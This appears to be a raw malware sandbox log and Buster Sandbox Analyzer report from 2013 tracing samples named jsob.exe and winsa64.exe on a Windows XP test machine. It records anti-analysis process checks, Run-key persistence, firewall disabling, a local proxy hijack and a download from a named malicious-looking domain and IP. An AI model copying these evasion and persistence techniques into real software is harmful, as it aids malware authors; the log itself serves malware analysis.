FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(oleaut32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(USER32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
IsDebuggerPresent() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\system32\uxtheme.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
BitBlt() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,92) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\ntdll.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\imm32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\KERNEL32) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(version.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenMutex(ShimCacheMutex) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(c:\windows\system32\msctfime.ime) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(user32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(security.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETWORKAREA,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(ole32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(9078c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(607a0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(6079c) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c07e4) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2_32.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(ws2help.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
LoadLibrary(fwpuclnt.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETFONTSMOOTHINGTYPE,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetForegroundWindow() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
GetModuleHandle(C:\WINDOWS\system32\Msimtf.dll) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SetTimer(c076e) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
FindWindow(Shell_TrayWnd,(null)) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
SystemParametersInfo(SPI_GETICONTITLELOGFONT,60) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateMutex(MSCTF.Shared.MUTEX.IKG) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(ctfmon.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(u1210.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(SbieCtrl.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(wireshark.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(sniff_hit.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(VBoxTray.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(procexp.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(BSA.EXE) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(dumpcap.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(jsobs.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(PE Explorer (portable).exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(idag.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(notepad.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
OpenProcess(EvO_DBG.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPPROCESS,0) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
QuerySystemInformation() [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(System,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(smss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(csrss.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(winlogon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(services.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(lsass.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxService.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(svchost.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieSvc.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(explorer.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(VBoxTray.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(ctfmon.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(alg.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(idag.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(PE Explorer (portable).exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(notepad.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(EvO_DBG.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Comprovante.pdf2.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(sniff_hit.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsob.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(procexp.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(Projeto.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(jsobs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(u1210.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(BSA.EXE,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SbieCtrl.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(wireshark.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(dumpcap.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieRpcSs.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
lstrcmpi(SandboxieDcomLaunch.exe,explorer.exe) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]
CreateFile(c:\wina\s33ass.txt) [c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe]

 Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\jsob.exe

 [ Changes to filesystem ]
   * No changes

 [ Changes to registry ]
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "jsob.exe=43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\RUN
                 binary data=C:\Documents and Settings\r32\Escritorio\Infect3d\Comprovante\jsob.exe

 [ Network services ]
   * No changes

 [ Process/window/string information ]
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
   * Creates a mutex "MSCTF.Shared.MUTEX.IKG".
   * Enumerates running processes.
   * Contains string Traces of AutoStart registry key ("Software\Microsoft\Windows\CurrentVersion\Run")
   * Contains string Checks for Chrome browser software presence ("CHROME.EXE")
   * Contains string Anti-Malware Analyzer routine: Norman Sandbox detection ("CurrentUser")
   * Contains string Checks for FireFox browser software presence ("FIREFOX.EXE")

Report generated with Buster Sandbox Analyzer 1.85 at 15:56:27 on 07/02/2013

Detailed report of suspicious malware actions:

Anti-Malware Analyzer routine: Norman Sandbox detection
Checked for debuggers
Checks for Chrome browser software presence
Checks for FireFox browser software presence
Created a mutex named: CTF.Asm.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Compart.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.Layouts.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TimListCache.FMPDefaultS-1-5-21-1482476501-1202660629-1957994488-1003MUTEX.DefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: CTF.TMD.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003
Created a mutex named: MSCTF.Shared.MUTEX.IKG
Defined registry AutoStart location created or modified: user\current\software\Microsoft\Windows\CurrentVersion\RUN\jsob.exe = 43003A005C0044006F00630075006D0065006E0074007300200061006E0064002000530065007400740069006E00670073005C007200330032005C004500730063007200690074006F00720069006F005C0049006E006600650063007400330064005C0043006F006D00700072006F00760061006E00740065005C006A0073006F0062002E006500780065000000
Enumerated running processes
Traces of AutoStart registry key

SystemParametersInfo(SPI_GETDRAGFULLWINDOWS,4) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETHIGHCONTRAST,12) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\dwwin.exe) [c:\windows\system32\dwwin.exe]
FreeLibrary(C:\WINDOWS\system32\msv1_0.dll) [c:\windows\system32\dwwin.exe]
OpenProcessToken(C:\WINDOWS\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETNONCLIENTMETRICS,500) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETMENUDROPALIGNMENT,0) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETMOUSEHOVERTIME,0) [c:\windows\system32\drwtsn32.exe]
SystemParametersInfo(SPI_GETFLATMENU,0) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(LPK.DLL) [c:\windows\system32\drwtsn32.exe]
OpenProcess(drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(USER32) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(imm32.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(Global\userenv:  User Profile setup event) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\lz32.dll) [c:\windows\system32\drwtsn32.exe]
ResumeThread() [c:\windows\system32\drwtsn32.exe]
LoadLibrary(ntdll.dll) [c:\windows\system32\drwtsn32.exe]
CreateEvent(DbgEngEvent_00000550) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(rpcrt4.dll) [c:\windows\system32\drwtsn32.exe]
GetComputerName() [c:\windows\system32\drwtsn32.exe]
AdjustTokenPrivileges(SE_PRIVILEGE_ENABLED) [c:\windows\system32\drwtsn32.exe]
OpenProcess(HxD.exe) [c:\windows\system32\drwtsn32.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_RESERVE,PAGE_READWRITE) [c:\windows\system32\drwtsn32.exe]
VirtualAllocEx(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe,MEM_COMMIT,PAGE_READWRITE) [c:\windows\system32\drwtsn32.exe]
WriteProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\drwtsn32.exe]
CreateFile(C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\kernel32.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\system32\exts.dll) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(c:\windows\system32\ntsdexts.dll) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\hxd\hxd.exe) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(ntdll.dll) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1848) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1900) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1836) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1832) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1676) [c:\windows\system32\drwtsn32.exe]
Sleep(0) [c:\windows\system32\drwtsn32.exe]
GetUserName() [c:\windows\system32\drwtsn32.exe]
LoadLibrary(secur32.dll) [c:\windows\system32\drwtsn32.exe]
QuerySystemInformation() [c:\windows\system32\drwtsn32.exe]
OpenProcess(System) [c:\windows\system32\drwtsn32.exe]
OpenProcess(smss.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\smss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(csrss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(winlogon.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\winlogon.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(services.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\services.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(lsass.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\lsass.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(VBoxService.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\vboxservice.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(svchost.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\svchost.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SbieSvc.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sbiesvc.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(explorer.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\explorer.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(VBoxTray.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\vboxtray.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(ctfmon.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\ctfmon.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(alg.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(XueTr.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\xuetr\xuetr.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(u1210.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\red\u1210.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(iexplore.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\internet explorer\iexplore.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(firefox.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\mozilla firefox\firefox.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(BSA.EXE) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\descargas\bsa\bsa.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(sniff_hit.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\idefense\map\sniff_hit.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(wireshark.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\wireshark\wireshark.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(dumpcap.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\wireshark\dumpcap.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SbieCtrl.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sbiectrl.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(procexp.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\documents and settings\r32\mis documentos\tools\procexp.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(wmiprvse.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SandboxieRpcSs.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sandboxierpcss.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(SandboxieDcomLaunch.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\archivos de programa\sandboxie\sandboxiedcomlaunch.exe) [c:\windows\system32\drwtsn32.exe]
OpenProcess(winsa64.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\sandbox\r32\defaultbox\drive\c\windows\winsa64.exe) [c:\windows\system32\drwtsn32.exe]
ReadProcessMemory(c:\windows\system32\drwtsn32.exe) [c:\windows\system32\drwtsn32.exe]
TerminateProcess(à?¤\dee\harskvol1\do) [c:\windows\system32\drwtsn32.exe]
CreateFile(C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp) [c:\windows\system32\drwtsn32.exe]
LoadLibrary(psapi.dll) [c:\windows\system32\drwtsn32.exe]
CreateToolhelp32Snapshot(TH32C2_SNAPALL,964) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1648) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1644) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1640) [c:\windows\system32\drwtsn32.exe]
SuspendThread(1636) [c:\windows\system32\drwtsn32.exe]
FreeLibrary() [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ntdll.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\USER32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\GDI32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\IMM32.DLL) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ADVAPI32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\RPCRT4.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\Secur32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\OLEAUT32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\msvcrt.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ole32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\VERSION.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\SHLWAPI.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\SHELL32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\WINMM.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\UxTheme.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\psapi.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\MSACM32.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\DBGHELP.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\exts.dll) [c:\windows\system32\drwtsn32.exe]
FreeLibrary(C:\WINDOWS\system32\ntsdexts.dll) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(mscoree.dll) [c:\windows\system32\drwtsn32.exe]
ExitProcess(0) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(EXPLORER.EXE) [c:\windows\system32\drwtsn32.exe]
GetModuleHandle(C:\WINDOWS\system32\Msctf.dll) [c:\windows\winsa64.exe]

Report generated with Buster Sandbox Analyzer 1.85 at 12:31:20 on 08/02/2013

 [ General information ]
   * File name: c:\documents and settings\r32\escritorio\infect3d\comprovante\winsa64.exe

 [ Changes to filesystem ]
   * Creates file C:\WINDOWS\winsa64.cfg
   * Creates file C:\WINDOWS\winsa64.exe
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\drwtsn32.log
   * Creates file C:\Documents and Settings\All Users\Datos de programa\Microsoft\Dr Watson\user.dmp
   * Modifies file C:\Documents and Settings\r32\Configuración local\Archivos temporales de Internet\Content.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Configuración local\Historial\History.IE5\index.dat
   * Modifies file C:\Documents and Settings\r32\Cookies\index.dat

 [ Changes to registry ]
   * Modifies value "NumberOfCrashes=00000003" in key HKEY_LOCAL_MACHINE\software\microsoft\DrWatson
          old value "NumberOfCrashes=00000002"
   * Modifies value "NukeOnDelete=00000001" in key HKEY_LOCAL_MACHINE\software\microsoft\Windows\CurrentVersion\Explorer\BitBucket
          old value empty
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile
   * Creates value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile
   * Modifies value "DisableNotifications=00000001" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
          old value empty
   * Empties value "EnableFirewall" in key HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
         old value "EnableFirewall=00000001"
   * Modifies value "ProxyEnable=00000001" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
          old value empty
   * Creates value "ProxyServer=3100320037002E0030002E0030002E0031003A0039003600360036000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                    binary data=127.0.0.1:9666
   * Modifies value "ProxyOverride=3100320037002E0030002E0030002E0031000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings
                       binary data=127.0.0.1
          old value "ProxyOverride=6C006F00630061006C000000"
                       binary data=local
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020720130208
   * Creates Registry key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012013020820130209
   * Modifies value "SavedLegacySettings=46000000B9010000030000000E0000003132372E302E302E313A39363636090000003132372E302E302E3100000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
          old value "SavedLegacySettings=46000000BA0100000100000000000000050000006C6F63616C00000000040000000000000050EB206AFBFACD01010000000A00020F000000000000000000000000"
   * Creates value "winsa64=43003A005C00570049004E0044004F00570053005C00770069006E0073006100360034002E006500780065000000" in key HKEY_CURRENT_USER\software\Microsoft\Windows\CurrentVersion\Run
                binary data=C:\WINDOWS\winsa64.exe

 [ Network services ]
   * Looks for an Internet connection.
   * Queries DNS "www.cadastramento.net".
   * Queries DNS "www.chabvf.info".
   * Queries DNS "www.yoeqtxutb.info".
   * Queries DNS "www.itjdcryfa.info".
   * Queries DNS "solutionfinder.microsoft.com".
   * Queries DNS "s3.amazonaws.com".
   * Queries DNS "google.es".
   * Queries DNS "www3.nationalgeographic.com".
   * Queries DNS "google.bg".
   * Queries DNS "google.net".
   * Queries DNS "google.co.uk".
   * Queries DNS "google.kz".
   * Queries DNS "google.pt".
   * Queries DNS "google.by".
   * C:\WINDOWS\winsa64.exe Connects to "212.1.208.24" on port 80 (TCP - HTTP).
   * Downloads file from "www.cadastramento.net/sistema.html".

 [ Process/window/string information ]
   * Enables process privileges.
   * Gets user name information.
   * Gets system default language ID.
   * Gets computer name.
   * Checks for debuggers.
   * Creates a mutex "CTF.LBES.MutexDefaultS-1-5-21-1482476501-1202660629-1957994488-1003".
